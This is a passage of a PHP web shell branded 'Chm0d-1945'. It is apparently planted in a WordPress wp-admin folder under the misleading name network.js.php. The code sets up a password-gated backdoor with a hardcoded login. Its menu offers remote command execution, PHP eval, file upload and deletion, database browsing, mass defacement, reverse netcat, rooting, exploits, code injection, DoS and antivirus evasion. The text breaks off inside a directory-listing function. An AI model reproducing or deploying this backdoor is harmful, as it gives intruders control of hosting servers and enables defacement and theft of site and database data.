File: /homepages/35/d967185540/htdocs/clickandbuilds/CUS/wp-admin/network.js.php
<?php
$u = "chmod"; // username is chmod
$p = "33b87b259a0031392539cc7d11dd73fc"; //password is "1945"
header("Pragma: no-cache");
header("Cache-Control: no-store");
error_reporting(0);
session_start();
if (@get_magic_quotes_gpc()) {
function stripslashes_deep($value){
return is_array($value)? array_map('stripslashes_deep', $value):stripslashes($value);
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
}
$ip = get_client_ip();
$islinux = !(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
$url = getCompleteURL();
$rpath = isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:"";
$url_info = parse_url($url);
if( !isset($_SERVER['DOCUMENT_ROOT']) ) {
if ( isset($_SERVER['SCRIPT_FILENAME']) )
$path = $_SERVER['SCRIPT_FILENAME'];
elseif ( isset($_SERVER['PATH_TRANSLATED']) )
$path = str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']);
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($path, 0, 0-strlen($_SERVER['PHP_SELF'])));
}
$doc_root = str_replace('//','/',str_replace(DIRECTORY_SEPARATOR,'/',$_SERVER["DOCUMENT_ROOT"]));
$fm_self = $doc_root.$_SERVER["PHP_SELF"];
$path_info = pathinfo($fm_self);
// Register Globals
$blockKeys = array('_SERVER','_SESSION','_GET','_POST','_COOKIE','charset','ip','islinux','url','url_info','doc_root','fm_self','path_info');
foreach ($_GET as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val;
foreach ($_POST as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val;
foreach ($_COOKIE as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val;
if (!isset($_SESSION["current_dir"])){
$_SESSION["current_dir"]=$path_info["dirname"]."/";
if (!$islinux)
{
$_SESSION["current_dir"] = ucfirst($_SESSION["current_dir"]);
}
}
$current_dir=$_SESSION["current_dir"];
chdir($current_dir);
if(!isLogged() and isset($_REQUEST['cv']))
{
$script = basename(__FILE__);
header("Location: $script");
exit(0);
}
if(!isLogged())
{
try {
$username = isset($_REQUEST['username'])? $_REQUEST['username']:"";
$password = isset($_REQUEST['password'])? $_REQUEST['password']:"";
if($username===$u and md5($password)===$p)
{
session_regenerate_id();
$_SESSION['username']='admin';
$script = basename(preg_replace('@\(.*\(.*$@', '', __FILE__));
header("Location: {$script}");
}
else {
displayLoginForm();
exit(0) ;
}
}
catch(Exception $e)
{
echo "Error: ". $e->getMessage();
}
}
initializeSession();
displayPage();
function initializeSession()
{
global $current_dir, $cv, $ajx,$rpath, $path_info,$home, $dl, $del, $filename,
$cd, $acp, $upl,$md,$defacePath,$ev,$sd,$connectDatabase,$listTables,
$dlf,$dff,$tableData,$killPids,$Find,$cdf,$dlfile,$command,$NewFolder,
$NewFile,$delf,$oldfname,$newfname,$vf,$cds;
global $rnd;
$rnd=rand(10,99);
if(!isset($_SESSION['current_dir']))
$_SESSION['current_dir']=$current_dir;
if(!isset($_SESSION["view"]))
$_SESSION["view"]="File Manager";
if(!isset($_SESSION['HomeDir']))
$_SESSION['HomeDir'] = $path_info['dirname'];
if(isset($cv))
{
if($cv==1)
{
$_SESSION["view"]="File Manager";
}
else if($cv==2)
{
$_SESSION["view"]="Upload";
}
else if($cv==3)
{
$_SESSION["view"]="CMD";
}
else if($cv==4)
{
$_SESSION["view"]="Database";
}
else if($cv==5)
{
$_SESSION["view"]="Mass Deface";
}
else if($cv==6)
{
$_SESSION["view"]="Symlink";
}
else if($cv==7)
{
$_SESSION["view"]="Process";
}
else if($cv==8)
{
$_SESSION["view"]="Eval";
}
else if($cv==9)
{
$_SESSION["view"]="Find";
}
else if($cv==10)
{
$_SESSION["view"]="Rooting";
}
else if($cv==='chp')
{
$_SESSION["view"]="chp";
}
else if($cv==13)
{
$_SESSION["view"]="Config";
}
else if($cv==14)
{
$_SESSION["view"]="Mailer";
}
else if($cv==15)
{
$_SESSION["view"]="Domains";
}
else if($cv==16)
{
$_SESSION["view"]="Headers";
}
else if($cv==17)
{
$_SESSION["view"]="Netcat";
}
else if($cv==18)
{
$_SESSION["view"]="Commands";
}
else if($cv==20)
{
$_SESSION['view']="Info";
}
else if($cv==21)
{
$_SESSION["view"]="Hash";
}
else if($cv==22)
{
$_SESSION["view"]="ZoneH";
}
else if($cv==23)
{
$_SESSION["view"]="Exploit";
}
else if($cv==24)
{
$_SESSION["view"]="Code Inject";
}
else if($cv==25)
{
$_SESSION["view"]="Bypassers";
}
else if($cv==26)
{
$_SESSION["view"]="DoS";
}
else if($cv==27)
{
$_SESSION["view"]="Logs";
}
else if($cv==28)
{
$_SESSION["view"]="SelfKill";
}
else if($cv==29)
{
$_SESSION["view"]="Forums";
}
else if($cv==37)
{
$_SESSION["view"]="PortScanner";
}
else if($cv==34)
{
$_SESSION["view"]="EvadeAV";
}
else if($cv==11)
{
session_destroy();
}
header("Location: {$rpath}");
exit(0);
}
if(isset($upl))
{
saveFile();
}
if(isset($dff) and $dff=='Copy')
{
$_SESSION['Copy'] = $_POST['fileItem'];
$_SESSION['CopyPath']=$_SESSION['current_dir'];
$_SESSION['lastAction']='Copy';
header("Location: {$rpath}");
exit(0);
}
if(isset($dff) and $dff=='Cut')
{
$_SESSION['Cut'] = $_POST['fileItem'];
$_SESSION['CutPath']=$_SESSION['current_dir'];
$_SESSION['lastAction']='Cut';
header("Location: {$rpath}");
exit(0);
}
if(isset($dff) and $dff=='Paste')
{
processPaste();
header("Location: {$rpath}");
exit(0);
}
if(isset($dff) and $dff=='Delete')
{
processDelete();
header("Location: {$rpath}");
exit(0);
}
if(isset($dff) and $dff=='Zip')
{
compressFileFolder($_POST['fileItem']);
header("Location: {$rpath}");
exit(0);
}
if(isset($killPids))
{
killProcesses($_POST['killPid']);
}
if(isset($md))
{
massDeface($defacePath);
}
if(isset($NewFolder))
{
chdir($_SESSION['current_dir']);
mkdir($NewFolder);
chmod($NewFolder,0777);
header("Location: {$rpath}");
exit(0);
}
if(isset($NewFile))
{
chdir($_SESSION['current_dir']);
touch($NewFile);
chmod($NewFile,0777);
header("Location: {$rpath}");
exit(0);
}
if(isset($connectDatabase))
{
list($u,$h)=explode("@",$connectDatabase);
echo listDatabases($u,$h);
exit(0);
}
if(isset($listTables))
{
list($u,$h,$db)=explode("@",$listTables);
echo listTables($u,$h,$db);
exit(0);
}
if(isset($command))
{
$_SESSION['command']=$command;
header("Location: {$rpath}");
exit(0);
}
if(isset($delf))
{
total_delete($delf);
header("Location: {$rpath}");
exit(0);
}
if(isset($oldfname) and isset($newfname))
{
rename($oldfname,$newfname);
header("Location: {$rpath}");
exit(0);
}
if(isset($dlf))
{
$filename = compressFolder($dl);
//$filename = compressFileFolder();
download();
exit(0);
}
if(isset($dff))
{
$filename = compressFileFolder($_POST['fileItem']);
download();
exit(0);
}
if(isset($tableData))
{
list($u,$h,$db,$tbl)=explode("@",$tableData);
echo displayTableData($u,$h,$db,$tbl);
exit(0);
}
if(isset($ev))
{
phpEval();
exit(0);
}
if(isset($sd))
{
saveDatabaseCredentials();
exit(0);
}
if(isset($dl))
{
global $filename;
if($dlfile)
$filename = $dl;
else
$filename = $_SESSION['current_dir'].$dl;
download();
//header("Location: {$rpath}");
//exit(0);
}
if(isset($cd))
{
chdir($_SESSION['current_dir']);
chdir($cd);
$_SESSION['current_dir']=format_path(getcwd());
if($cdf)
{
$_SESSION["view"]="File Manager";
}
header("Location: {$rpath}");
exit(0);
}
if(isset($cds))
{
chdir($cds);
$_SESSION['current_dir']=format_path(getcwd());
$_SESSION["view"]="File Manager";
header("Location: {$rpath}");
exit(0);
}
if(isset($home))
{
$_SESSION['current_dir']=format_path($_SESSION['HomeDir']);
$_SESSION["view"]="File Manager";
header("Location: {$rpath}");
exit(0);
}
if(isset($acp))
{
ajaxCurrentPath();
exit(0);
}
if(isset($_SESSION["view"]))
{
if( $_SESSION["view"]=="CMD" and isset($ajx) and $ajx==1)
{
echo execute_cmd();
exit(0);
}
}
}
function includePopups()
{
?>
<div class='box' id='NewFolder'>
<form method="post">
New Folder: <input name='NewFolder' >
<input type='submit' value='Create'>
<input type='submit' value="Cancel" onclick="return cancelPopup('NewFolder')">
</form>
</div>
<div class='box' id='NewFile'>
<form method="post">
New File: <input name='NewFile'>
<input type='submit' value='Create'>
<input type='submit' value="Cancel" onclick="return cancelPopup('NewFile')">
</form>
</div>
<div class='box' id='NewName'>
<form method="post">
New File: <input name='newfname'>
<input type='hidden' name='oldfname' id='oldfname'>
<input type='submit' value='Rename'>
<input type='submit' value="Cancel" onclick="return cancelPopup('NewName')">
</form>
</div>
<?php
}
function displayPage()
{
global $Find,$oldusername,$oldpassword,$newusername,$newpassword,
$vf;
echo "<html>";
includeHead();
echo "<body onload=\"initPage();\">";
includeBanner();
includeMenuBar();
includeCurrentPath();
includePopups();
if(isset($vf))
{
echo "<div class='bodyDiv'>";
echo "<textarea readonly rows='30'>";
$data=file_get_contents($vf);
//$encoded = html_encode($data);
//echo mb_detect_encoding($data);
//echo htmlspecialchars_decode($data);
echo htmlentities($data, ENT_QUOTES | ENT_IGNORE, "UTF-8");
echo "</textarea></div>";
exit(0);
}
if(isset($_SESSION["view"]))
{
if( $_SESSION["view"]==="File Manager")
{
displayFileManager();
}
else if($_SESSION['view']==="Upload")
{
displayUpload();
}
else if( $_SESSION["view"]==="CMD")
{
displayCMD();
}else if( $_SESSION["view"]==="Database")
{
displayDatabase();
}
else if( $_SESSION["view"]==="Symlink")
{
displaySymlink();
}
else if( $_SESSION["view"]==="Mass Deface")
{
displayMassDeface();
}
else if( $_SESSION["view"]==="EvadeAV")
{
displayEvadeAV();
}
else if( $_SESSION["view"]==="Process")
{
displayProcess();
}
else if( $_SESSION["view"]==="Forums")
{
displayForums();
}
else if( $_SESSION["view"]==="Eval")
{
displayEval();
}
else if( $_SESSION["view"]==="Mailer")
{
displayMailer();
}
else if( $_SESSION["view"]==="Domains")
{
displayDomains();
}
else if( $_SESSION["view"]==="Info")
{
displayInfo();
}
else if( $_SESSION["view"]==="Commands")
{
displayCommands();
}
else if( $_SESSION["view"]==="Netcat")
{
displayReverseNetcat();
}
else if( $_SESSION["view"]==="Hash")
{
displayHash();
}
else if( $_SESSION["view"]==="Find")
{
displayFind();
if(isset($Find))
{
processFind();
exit(0);
}
}
else if( $_SESSION["view"]==="Rooting")
{
displayRooting();
}
else if( $_SESSION["view"]==="ZoneH")
{
displayZoneH();
}
else if( $_SESSION["view"]==="Exploit")
{
displayExploit();
}
else if( $_SESSION["view"]==="Code Inject")
{
displayCodeInject();
}
else if( $_SESSION["view"]==="Bypassers")
{
displayBypassers();
}
else if( $_SESSION["view"]==="DoS")
{
displayDoS();
}
else if( $_SESSION["view"]==="PortScanner")
{
displayPortScanner();
}
else if( $_SESSION["view"]==="Logs")
{
displayLogs();
}
else if( $_SESSION["view"]==="SelfKill")
{
displaySelfKill();
}
else if( $_SESSION["view"]==="chp")
{
if(isset($oldusername) and isset($oldpassword)
and isset($newusername) and isset($newpassword))
{
displayChangePassword();
processChangePassword();
}
else
{
displayChangePassword();
}
}
else if( $_SESSION["view"]==="Headers")
{
displayHeaders();
}
else if( $_SESSION["view"]==="Config")
{
findConfig();
}
}
echo "</body></html>";
}
function includeCurrentPath()
{
global $islinux, $rpath;
echo "<div id='acp'>";
$l = $_SESSION['current_dir'];
if($l[strlen($l)-1] === '/')
$l = substr($l,0,strlen($l)-1);
//echo $l;
//echo str_replace("/","",$_SESSION['current_dir'],$l);
$path = explode("/",$l);
$cd="";
if($islinux===false)
{
foreach (range("A", "Z") as $letter){
if(is_readable($letter.":\\")){
$letter.":";
echo "<a href='{$rpath}?cd={$letter}:'>[ " . $letter . "\\ ]</a>";
//$res .= "<tr><td>drive ".$drive."</td><td>".format_bit(@disk_free_space($drive))." free of ".format_bit(@disk_total_space($drive))."</td></tr>";
}
}
echo " - ";
foreach ($path as $p)
{
$cd.=$p . "\\";
echo "<a href='{$rpath}?cd={$cd}'>" . $p . "\\</a>";
}
}
else
{
foreach ($path as $p)
{
$cd.=$p . "/";
echo "<a href='{$rpath}?cd={$cd}'>" . $p . "/</a>";
}
}
echo "</div>";
}
function ajaxCurrentPath()
{
global $islinux, $rpath;
$l = $_SESSION['current_dir'];
if($l[strlen($l)-1] === '/')
$l = substr($l,0,$l-1);
//echo $l;
//echo str_replace("/","",$_SESSION['current_dir'],$l);
$path = explode("/",$l);
$cd="";
if($islinux===false)
{
foreach ($path as $p)
{
$cd.=$p . "\\";
echo "<a href='{$rpath}?cd={$cd}'>" . $p . "\\</a>";
}
}
}
function includeHead()
{
echo "<head><title>Chm0d-1945</title><link rel='SHORTCUT ICON' href='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAcCAQAAADc8cciAAAAAmJLR0QA/4ePzL8AAAAHdElNRQffDAgRIDphlPXjAAABvUlEQVQ4y53UTYjMcRjA8c+OmdnB0qQk7a5QSF6KZHFTlJRcnDbr4oBw2to9uMiBHNxcRS5yEC7KzWaVrS1Kuzgo76R2d2TQbHZ/DvNiXv4zY+b5Hf7P8+v5/p6e5/88D+1I0hmItQXP6pMkrj35ZVUzl5i4uE7LrS7ddYKXVrpXP3LcXdvEdUhJiHtrixxeWeOsRb7oqoeeMifUnCvOm7BXsNu4fVFgh0MRYPm55olLUWjKhyZoEAznnZdUoGtlI1ynPa+wjxfdH1hWQrdHRvluqXUla85POQvywKicA+Co35HwIG6UrJPSUsVox7wR9Bqsm9+IryV9c3WJepuW547Pgh8WR1X4RCQyU/hOmcBB6eiWeBSBZiSMeS0YEv5lWSvpCPgZ2CUIbtfrYOj2p2q+rrpVGL5Rj21tPD8zVXEHJPTrEUwJhhrDw1XwYftlBOesMNB8vD8JgsvmBTdr/2c96bLBpCAYw3WhWY7lslEw7aJ3Ysjos6mVjXTBt4LWI7gv2eo+3FPQ+r0QnG7lgRHZMmunnKz1/ws/FCys6rmnzZdrXj5ituw+Y9wOicZwsSkn0e19xaQdMd8Y/gstnwtCbO42lAAAAABJRU5ErkJggg=='>";
includeCSS();
includeJavascript();
echo "</head>";
}
function includeCSS()
{
?>
<style type="text/css">
body
{
background-color: #000000;
}
*{font-family:Ubuntu Mono, arial, serif,algerian;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:0;}
*{
color:white;
}
input{
color:black;
border-radius:5px;
padding:4px;
margin:2px;
font-size:.8em;
}
select,option{
color:#5EFB6E;
background:#001100;
}
table {
width: 100%;
background:#444444;
border:0;
border-collapse: collapse;
border-radius:5px;
font-size:.8em;
}
table, th,td {
border-bottom: thin solid #222222;
}
table#db, td#db {
border: thin solid #333333;
}
table#find, td#find {
border: thin solid #333333;
}
table#db td:first-child { width: 20%; }
table#find td:first-child { width: 20%; }
table#bypass td:first-child { width: 15%; }
th{
padding: 6px 8px;
background:#333333;
}
td{
padding: 6px 8px;
}
td.center{
text-align: center;
}
tr:hover {
background: #777777 none repeat scroll 0 0;
}
div#textAreaDiv{
margin:10px 10px 10px 10px ;
}
div#cmdDiv{
margin:10px 10px 10px 10px ;
}
div#upload{
margin:10px 10px 10px 10px ;
border: thin solid #444444;
background:#444444;
border-radius:5px;
padding:6px 8px;
}
div.bodyDiv{
margin:10px 10px 10px 10px ;
border: thin solid #444444;
background:#444444;
border-radius:5px;
padding:6px 8px;
width:auto;
}
div.box{
min-width:50%;
border:1px solid #dddddd;
padding:8px 8px 0 8px;
border-radius:8px;
position:fixed;
background:white;
opacity:1;
box-shadow:1px 1px 11px #ffffff;
top: 50%;
left: 50%;
-webkit-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
display:none;
}
div#tableDataDiv{
margin-left:10px ;
border-radius:5px;
padding:6px 8px;
width:100%;
}
div#bannerDiv{
margin:10px 10px 10px 10px ;
font-size:1em;
border: thin solid black;
background:black;
border-radius:15px;
padding:6px 8px;
color:#5EFB6E;
line-height:100%
}
div#bannerDiv:hover{
margin:10px 10px 10px 10px ;
border: thin solid #222222;
background:#222222;
border-radius:15px;
padding:6px 8px;
}
div.divDatabases{
margin:10px 10px 10px 10px ;
border: thin solid #444444;
background:#444444;
border-radius:5px;
padding:6px 8px;
position:relative;
}
div#dbContainer1 {
width: 30em;
border: thin solid;
border: thin solid #444444;
background:#444444;
margin:10px 10px 10px 10px ;
border-radius:5px;
}
div#FileManager {
border: thin solid;
border: thin solid #444444;
background:#444444;
margin:10px 10px 10px 10px ;
border-radius:5px;
}
div.box {
width: 45%;
border: thin solid #444444;
background:#444444;
float: left;
box-sizing: border-box;
}
div#acp{
margin:10px 10px 10px 10px ;
}
textarea
{
width:100%;
padding:6px 8px;
border-style: solid;
border-color:#444444;
border-width: 1px;
border-radius:5px;
background:#446644;
font-size:1em;
}
div#menu{
padding:6px 8px;
margin:10px 10px 10px 10px ;
border-style: solid;
border-color:black;
border-width: 1px;
background-color:black;
}
a{
text-decoration: none;
padding: 2px 5px;
font-size:1em;
padding-left:5px;
}
div#menu a{
border-radius:4px;
font-size:1.2em;
line-height:160%;
}
a.menu{
margin-left:2px;
margin-right:2px;
border-style: solid;
border-color:#5EFB6E;
border-width: 1px;
background-color:#003300;
}
div#logo{
float:right;
margin-top:15px;
color: #5EFB6E;
text-shadow:4px 4px 25px #ffffff;
font-size:1em;
}
span#logo
{
color: #5EFB6E;
font-size:4em;
}
span#logo1
{
color: #5EFB6E;
font-size:3em;
}
a:link {
color: #5EFB6E;
}
/* visited link */
a:visited {
color: #5EFB6E;
}
/* mouse over link */
a:hover {
background-color: #111111;
}
/* selected link */
a:active {
background-color: #999999;
}
</style>
<?php
}
function includeJavascript()
{
global $rpath;
?>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script type="text/javascript">
function getXMLHTTP() {
var x = false;
try {
x = new XMLHttpRequest();
}catch(e) {
try {
x = new ActiveXObject("Microsoft.XMLHTTP");
}catch(ex) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e1) {
x = false;
}
}
}
return x;
}
var ajaxRequest;
var cmdHistory= new Array("");
var cmdHistoryPos = 0;
var cmdFlag=0;
function executeCMD()
{
var c = document.getElementById("cmd").value;
cmdHistory.push(c);
cmdHistoryPos=cmdHistory.length-1;
//alert("try t osend request " +c);
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponse;
ajaxRequest.open("GET", "<?=$rpath ?>?cmd=" + c + "&ajx=1");
ajaxRequest.send(null);
}
}
function displayNewFolder()
{
document.getElementById("NewFolder").style.display="inline-block";
}
function cancelPopup(v)
{
document.getElementById(v).style.display="none";
return false;
}
function displayNewFile(v)
{
document.getElementById(v).style.display="inline-block";
}
function displayPopupNewName(v,w)
{
document.getElementById('oldfname').value=w;
document.getElementById(v).style.display="inline-block";
}
function validateSelectedItems()
{
return false;
var inputs = document.getElementsByTagName("input");
for(var i = 0; i < inputs.length; i++) {
if(inputs[i].type == "checkbox" && inputs[i].checked)
return true;
}
alert('You must select at least 1');
return false;
}
function saveDB()
{
var dbusername = document.getElementById("dbusername").value;
var dbpassword = document.getElementById("dbpassword").value;
var dbname = document.getElementById("dbname").value;
var dbhost = document.getElementById("dbhost").value;
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseSaveDB;
ajaxRequest.open("GET", "<?=$rpath ?>?sd=1&dbusername="+dbusername+"&dbpassword="+dbpassword+"&dbname="+dbname+"&dbhost="+dbhost);
ajaxRequest.send(null);
}
}
function connectDatabase(c)
{
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseConnectDatabase;
ajaxRequest.open("GET", "<?=$rpath ?>?connectDatabase=" + c + "&ajx=1");
ajaxRequest.send(null);
}
}
function displayTableData(c)
{
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseDisplayTableData;
ajaxRequest.open("GET", "<?=$rpath ?>?tableData=" + c + "&ajx=1");
ajaxRequest.send(null);
}
}
function listTables(c)
{
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseListTables;
ajaxRequest.open("GET", "<?=$rpath ?>?listTables=" + c + "&ajx=1");
ajaxRequest.send(null);
}
}
function executeEval()
{
var c = document.getElementById("tarea").value;
//alert(c);
//alert("try t osend request " +c);
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseEval;
ajaxRequest.open("GET", "<?=$rpath ?>?ev=" + c + "&ajx=1");
ajaxRequest.send(null);
}
}
function ajaxCurrentPath()
{
ajaxRequest = getXMLHTTP();
if (ajaxRequest) { // if the object was created successfully
ajaxRequest.onreadystatechange = ajaxResponseACP;
ajaxRequest.open("GET", "<?=$rpath ?>?acp=1");
ajaxRequest.send(null);
}
}
function selectCMD()
{
document.getElementById("cmd").select();
}
function ajaxResponseDisplayTableData() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("tableDataDiv").innerHTML = ajaxRequest.responseText;
document.getElementById("tableDataDiv").style.display="block";
//document.getElementById("tableDataDiv").style.width = document.getElementById("table01").style.width;
//document.getElementById("tarea").innerHTML ="";
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponseEval() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("evalBody").innerHTML = ajaxRequest.responseText;
//document.getElementById("tarea").innerHTML ="";
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponseListTables() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("tablesListDiv").innerHTML = ajaxRequest.responseText;
document.getElementById("tablesListDiv").style.display="block";
//document.getElementById("tableDataDiv").innerHTML = "Table Data";
document.getElementById("tableDataDiv").style.display = "none";
//document.getElementById("tarea").innerHTML ="";
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponseConnectDatabase() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("databasesListDiv").innerHTML = ajaxRequest.responseText;
document.getElementById("databasesListDiv").style.display="block";
document.getElementById("tableDataDiv").style.display="none";
document.getElementById("tablesListDiv").style.display="none";
//document.getElementById("tableDataDiv").innerHTML = "Table Data";
//document.getElementById("tablesListDiv").innerHTML = "List of Tables";
//document.getElementById("tarea").innerHTML ="";
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponseSaveDB() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("dbConnectionsList").innerHTML = ajaxRequest.responseText;
//document.getElementById("tableDataDiv").innerHTML = "Table Data";
//document.getElementById("databasesListDiv").innerHTML = "Dtabases";
//document.getElementById("tablesListDiv").innerHTML = "Tables";
document.getElementById("tableDataDiv").style.display = "none";
document.getElementById("databasesListDiv").style.display = "none";
document.getElementById("tablesListDiv").style.display = "none";
//alert("response reeturn");
//document.getElementById("tarea").innerHTML ="";
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponseACP() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("acp").innerHTML = ajaxRequest.responseText;
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function ajaxResponse() //This gets called when the readyState changes.
{
if (ajaxRequest.readyState != 4) // check to see if we�re done
{
return;
}
else {
if (ajaxRequest.status == 200) // check to see if successful
{ // process server data here. . .
//alert(ajaxRequest.responseText);
document.getElementById("tarea").value += ajaxRequest.responseText;
var textArea = document.getElementById("tarea");
textArea.scrollTop = textArea.scrollHeight;
ajaxCurrentPath();
document.getElementById("cmd").value="";
document.getElementById("cmd").focus();
}
else {
alert("Request failed: " + ajaxRequest.statusText);
}
}
}
function initPage()
{
//alert("page initialized!");
var inpt = document.getElementById("cmd");
if(inpt)
inpt.addEventListener("keydown",keyPressed);
// $("form[name=fmform]").bind('submit',validateSelectedItems());
$("form[name=fmform]").bind('submit', function(v){
//alert();
var btn = jQuery("#fmform1").context.activeElement.value;
if((btn =='Copy' || btn =='Cut' || btn =='Delete' || btn =='Zip') && $('input[name="fileItem[]"]:checked').length == 0 )
{
alert("You must check at least one file");
return false;
}
else
return true;
return false;
});
}
function clearHistory()
{
cmdHistory = [""];
cmdHistoryPos=0;
}
function keyPressed(event)
{
var newchar = String.fromCharCode(event.charCode || event.keyCode);
if(newchar=='&')
{
if(cmdHistoryPos > 0)
{
cmdHistoryPos-=1;
}
document.getElementById("cmd").value=cmdHistory[cmdHistoryPos];
}
else if(newchar=="(")
{
//document.getElementById("cmd").value="Down";
if(cmdHistoryPos < cmdHistory.length-1)
{
cmdHistoryPos+=1;
}
document.getElementById("cmd").value=cmdHistory[cmdHistoryPos];
}
else
{
cmdHistoryPos=cmdHistory.length;
}
}
function fileSelected()
{
//alert("File Selected!");
//var x = document.getElementsById("fileContainer");
var x = document.getElementsByClassName("selectFile");
//var i;
//for (i = 0; i < x.length; i++) {
// x[i].style.backgroundColor = "#eee";
//}
x[x.length-1].style.backgroundColor = "#666666";
var y = document.getElementById("fileContainer");
//alert(y);
// create Text
var br = document.createElement("br");
var textnode = document.createTextNode("Select File! ");
// creatt fileInput
var fileInput = document.createElement("input");
var fileAttrib = document.createAttribute("type");
fileAttrib.value = "file";
var onchangeAttrib = document.createAttribute("onchange");
onchangeAttrib.value = "fileSelected();";
var nameAttrib = document.createAttribute("name");
nameAttrib.value = "uploadFile[]";
fileInput.setAttributeNode(fileAttrib);
fileInput.setAttributeNode(onchangeAttrib);
fileInput.setAttributeNode(nameAttrib);
//create new div
var divSelectFile = document.createElement("div");
var divClassAttrib = document.createAttribute("class");
divClassAttrib.value = "selectFile";
divSelectFile.setAttributeNode(divClassAttrib);
/// append text and file input to dive
divSelectFile.appendChild(br);
divSelectFile.appendChild(textnode);
divSelectFile.appendChild(fileInput);
//y.appendChild(divSelectFile);
// append div to file container
y.appendChild(divSelectFile);
}
</script>
<?php
}
function includeBanner()
{
global $rpath;
echo "<div id=\"bannerDiv\">";
echo "<div id='logo'><a href='{$rpath}?home=1'><span id='logo'>chm0d-</span>
<span id='logo1'>1945</span></a></div>";
banner();
echo "</div>";
}
function includeMenuBar()
{
global $rpath;
?>
<div id="menu">
<a class="menu" href="<?php echo $rpath?>?home=1">Home</a>
<a class="menu" href="<?php echo $rpath?>?cv=1">FileManager</a>
<a class="menu" href="<?php echo $rpath?>?cv=2">Upload</a>
<a class="menu" href="<?php echo $rpath?>?cv=3">CMD</a>
<a class="menu" href="<?php echo $rpath?>?cv=4">Database</a>
<a class="menu" href="<?php echo $rpath?>?cv=5">MassDeface</a>
<a class="menu" href="<?php echo $rpath?>?cv=6">Symlink</a>
<a class="menu" href="<?php echo $rpath?>?cv=7">Process</a>
<a class="menu" href="<?php echo $rpath?>?cv=8">Eval</a>
<a class="menu" href="<?php echo $rpath?>?cv=9">Find</a>
<a class="menu" href="<?php echo $rpath?>?cv=13">Config</a>
<a class="menu" href="<?php echo $rpath?>?cv=14">Mailer</a>
<a class="menu" href="<?php echo $rpath?>?cv=15">Domains</a>
<a class="menu" href="<?php echo $rpath?>?cv=16">Headers</a>
<a class="menu" href="<?php echo $rpath?>?cv=17">Netcat</a>
<a class="menu" href="<?php echo $rpath?>?cv=18">Commands</a>
<a class="menu" href="<?php echo $rpath?>?cv=20">SecInfo</a>
<a class="menu" href="<?php echo $rpath?>?cv=21">Hash</a>
<a class="menu" href="<?php echo $rpath?>?cv=22">Zone-H</a>
<a class="menu" href="<?php echo $rpath?>?cv=23">Exploit</a>
<a class="menu" href="<?php echo $rpath?>?cv=24">CodeInject</a>
<a class="menu" href="<?php echo $rpath?>?cv=25">Bypasser</a>
<a class="menu" href="<?php echo $rpath?>?cv=26">DoS</a>
<a class="menu" href="<?php echo $rpath?>?cv=28">SelfRemove</a>
<a class="menu" href="<?php echo $rpath?>?cv=29">Forums</a>
<a class="menu" href="<?php echo $rpath?>?cv=34">EvadeAV</a>
<a class="menu" href="<?php echo $rpath?>?cv=37">PortScanner</a>
<a class="menu" href="<?php echo $rpath?>?cv=10">Rooting</a>
<a class="menu" href="<?php echo $rpath?>?cv=11">Logout</a>
<a class="menu" href="<?php echo $rpath?>?cv=chp">ChangePassword</a>
</div>
<?php
}
//echo $url;
function displayFileManager()
{
$dir = dirList($_SESSION['current_dir']);
displayDirList($dir);
}
function dirList($arg) {
$total = 0;
if(isset($_SESSION['current_dir']))
chdir($_SESSION['current_dir']);
if (file_exists($arg)) {
